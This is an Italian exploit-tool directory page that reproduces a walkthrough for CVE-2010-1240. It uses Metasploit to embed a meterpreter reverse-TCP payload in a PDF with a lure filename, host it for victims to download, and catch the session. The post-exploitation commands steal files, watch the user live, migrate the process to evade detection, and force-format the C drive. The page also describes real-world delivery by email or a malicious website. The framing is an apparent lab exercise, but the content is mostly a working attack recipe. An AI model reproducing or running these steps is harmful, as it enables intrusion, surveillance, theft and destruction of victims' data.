Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Embedded-Backdoor-Connection — Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando al bersaglio un file PDF dall'aspetto innocuo che in realtà contiene un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240. | Kitploit
Strumenti/GitHubGitHub/omarothmann/embedded-backdoor-connection
Strumenti di PhishingGenerazione di PayloadExploitPost-ExploitPenetration TestingCommand and ControlApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando al bersaglio un file PDF dall'aspetto innocuo che in realtà contiene un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240.

Vedi Repository
844 anni faNon ancora revisionato

Connessione Backdoor Integrata tramite File PDF 😈

presentato da    

Introduzione

Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando un file PDF dall'aspetto innocente che in realtà contiene un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240.

Non appena il PDF viene aperto in Adobe Reader, gli utenti che riusciamo a convincere ad accettare i pop-up di sicurezza ci permetteranno di ottenere una sessione meterpreter collegata ai loro dispositivi tramite connessione TCP inversa. Da quel momento, tutti i loro dati e ciò che stanno facendo in tempo reale sono sotto la nostra sorveglianza.

Hehe~Boi

Elenco di Software/Strumenti

  • Metasploit
  • Adobe Reader <= 8.1.2

Ambiente

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Macchina Attaccante: Kali Linux versione 2021.1
  • Sistema Operativo Target: Windows 10 (x86) o Windows 7 (x86)
  • Software Target: Adobe Reader 8.1.2

Passaggi Dettagliati

Per prima cosa, avviamo MSFconsole che ci fornisce un'interfaccia a riga di comando per accedere al framework Metasploit.

root@kitploit:~
msfconsole

Quindi, cerchiamo un exploit che corrisponda alla nostra piattaforma Windows target e ad Adobe PDF Reader; verrà mostrato un intero elenco di exploit che possono essere utilizzati per dirottare la macchina Windows della vittima e sfruttare le vulnerabilità di Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

In questa fase di sfruttamento, selezioniamo e usiamo il modulo "adobe_pdf_embedded_exe" con il comando seguente per raggiungere l'obiettivo di dirottare la vittima.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Possiamo anche controllare le informazioni dell'exploit usando il comando "info" come mostrato di seguito:

root@kitploit:~
info

Quindi, impostiamo il payload per usare una connessione TCP inversa. Usiamo anche Meterpreter che fornisce una shell interattiva che ci permette di usare tutti i tipi di funzioni inserendo ed eseguendo il codice per esplorare la macchina della vittima.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Poi, imposteremo l'host e la porta in ascolto. Per LHOST, dobbiamo inserire l'indirizzo IP della macchina attaccante, che in questo caso è l'indirizzo IP della nostra macchina Kali (10.0.2.4)*.

  • *p.s.
    • Devi usare l'indirizzo IP della tua macchina Kali
    • Puoi usare un numero di porta diverso

Nel frattempo, per LPORT, spetta a noi impostare un numero di porta che non sia comunemente usato.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Quindi, imposteremo il file di input come base del PDF con il flag INFILENAME*. Successivamente, imposteremo il nome del file con qualcosa che attiri l'interesse della vittima ad aprire il file PDF malevolo.

  • *p.s.
    • Devi assicurarti del percorso del tuo file PDF
    • Puoi usare un nome file diverso
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Possiamo rivedere le nostre opzioni prima di inserire il comando "exploit" per generare il payload insieme al PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Una volta generato il file PDF, lo sposteremo in /var/www/html, che è la directory della nostra macchina Kali per ospitare il server web applicativo da cui la vittima scaricherà il PDF più tardi.

  • Nota:
    • Se hai impostato un nome file diverso, assicurati di copiare il percorso giusto!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Quindi, per impostare il nostro listener, useremo "exploit/multi/handler". Anche in questo caso, imposteremo il payload, LHOST e LPORT in linea con quanto definito durante la generazione del file PDF malevolo. Poi eseguiremo il payload.

  • Nota:
    • LHOST: fai attenzione all'indirizzo IP della tua macchina Kali
    • LPORT: se hai impostato un numero di porta diverso, assicurati di digitarlo correttamente
    • show info o show options è un comando facoltativo da eseguire.
      • Eseguirlo serve solo per verificare ciò che hai appena impostato
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

In un altro terminale, controlliamo lo stato del server Apache per assicurarci che sia in esecuzione e possa ospitare il nostro file PDF in /var/www/html per il download da parte della vittima.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Sulla macchina Windows, apri un qualsiasi browser, ad esempio Chrome, e digita l'IP della nostra Kali (10.0.2.4)* per accedere al server web applicativo della macchina Kali.

*Nota: Fai attenzione all'indirizzo IP della tua macchina Kali

Quindi, simula un utente che salva il file PDF desiderato.

Una volta che il file viene aperto dalla vittima in Adobe Reader 8.1.2 accettando i messaggi di sicurezza richiesti, possiamo osservare sulla nostra macchina Kali che abbiamo una nuova sessione collegata tramite connessione TCP inversa.

Nello scenario reale, imposteremo un sito web con il PDF contenente il payload incorporato per far scaricare il file alla vittima o allegarlo via email.


Risultato dello sfruttamento

Quindi, possiamo accedere da remoto alla macchina della vittima e compiere ulteriori azioni malevole che desideriamo nella sessione meterpreter.

Per mostrare un elenco di cose che possiamo fare

root@kitploit:~
help

Elenca la directory corrente

root@kitploit:~
pwd

Elenca i file in quella directory

root@kitploit:~
ls

Scarica una cartella o un file dalla macchina della vittima

Ad esempio, se c'è un file chiamato password.txt, possiamo eseguire il comando download password.txt

root@kitploit:~
download [folder name | filename with extension]

Crea un file sulla macchina della vittima

Ovviamente, possiamo scrivere uno script malevolo (impiantando una backdoor) per continuare a collegarci alla macchina Windows se siamo davvero malvagi! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Interagisci con Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Aggiuntivo

Tuttavia, l'attaccante può ridurre i sospetti migrando il processo di meterpreter verso un altro processo usando il modulo migrate nella sessione meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Qui, genererà automaticamente un nuovo processo nella macchina della vittima su cui migrare. La vittima potrebbe quindi eliminare il file PDF infetto, completamente all'oscuro del fatto che il processo si è già spostato altrove.

L'attaccante può inoltre creare script malevoli sulla macchina target usando il prompt dei comandi (cmd) o PowerShell, in grado di far collassare l'intero sistema operativo e impedirne il corretto funzionamento.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Video Dimostrativo

Demo

Scarica lo strumento